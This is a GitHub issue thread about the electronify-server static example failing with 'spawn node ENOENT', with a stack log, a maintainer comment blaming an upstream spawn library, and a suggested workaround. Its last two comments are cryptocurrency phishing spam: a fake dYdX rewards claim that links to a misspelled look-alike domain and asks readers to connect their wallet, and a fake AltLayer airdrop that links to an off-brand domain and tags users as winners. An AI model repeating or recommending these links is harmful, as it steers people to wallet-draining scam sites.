### ISSUE TITLE
examples - static on linux = Error: spawn node ENOENT

### ISSUE THREAD

**Issue by patricksebastien** [eliquious/electronify-server#16]
```electron .
[10:43:12] App ready.
/home/psc/Code/electronify-server/examples/static/src
[10:43:12] Command started. [PID: undefined]
PID: undefined
[10:43:12] Error: spawn node ENOENT
{ Error: spawn node ENOENT
    at exports._errnoException (util.js:1026:11)
    at Process.ChildProcess._handle.onexit (internal/child_process.js:193:32)
    at onErrorNT (internal/child_process.js:359:16)
    at _combinedTickCallback (internal/process/next_tick.js:74:11)
    at process._tickCallback (internal/process/next_tick.js:98:9)
  code: 'ENOENT',
  errno: 'ENOENT',
  syscall: 'spawn node',
  path: 'node',
  spawnargs: [ 'server.js' ] }
[10:43:12] Loading failed.
-102 'ERR_CONNECTION_REFUSED' 'http://127.0.0.1:8081/'
[10:43:12] Finished loading.
[10:43:14] All windows closed.
[10:43:14] Window closed.
```
But running node on the command line works:
node server.js

**Comment by Stefdv** [comment]
Exactly the same problem on Windows 10.

**Comment by eliquious** [comment]
It seems like the issue is inside the library being used for the `spawn` command. There's an issue open on that library as well (https://github.com/patrick-steele-idem/child-process-promise/issues/8). I'll look at the solution proposed for that issue and try to work it in.

**Comment by mrfenix** [comment]
Have you found a solution for this yet?

**Comment by mackenrou** [comment]
I think this error occurs because the client is called before server is started.

My temp solution is working...
On index.js:
```javascript
.progress(function (childProcess) {
  debug('Command started. [PID: ' + childProcess.pid + ']');
  self.emit('child-started', childProcess);

  //wait for log from server...
  childProcess.stdout.on('data', function(buffer) {
    var out = buffer.toString();
    if(out.indexOf('Server lifted') > -1){
      start(cfg, app, childProcess, debug);
    }
  });
  
});
```

**Comment by ozgrozer** [comment]
@mackenrou Your solution didn't work for me. Still `spawn node ENOENT` error.

**Comment by muraliR** [comment]
## Congratulations! You've been chosen to receive a $7,000 Rewards. 🪂🔴 


### Trading and Launch Rewards are live on dYdX Chain! ✨

Connect your wallet, follow the instructions, and claim this exclusive offer from Dydx Exchange. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

[![Dydx Exchange](https://pbs.twimg.com/card_img/1729868185275617280/nzyJpc7G?format=jpg&name=small)](https://claim.dydxexchang.com/)


[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Rewards Now!** [Check Eligibility](https://claim.dydxexchang.com/)

Access the Dydx Exchange platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your Rewards, up to $2,000!

@dydxprotocol

**Comment by charoenlap** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayerio.online/zHaxVS)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.

To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others

For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).

[Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.


Winners: @ericwang1902, @ipalm0423, @KianYang-Lee, @sunk926, @cryptoalawi, @KevinJun98, @sulaiman5000, @conanthiley, @rgvural, @dlerario, @taseenb, @cedricporter, @Essaam, @xplains027, @Prestongerard, @rbhushan90, @JKorf, @HieuNguyen414, @cagodoy, @pyldin601
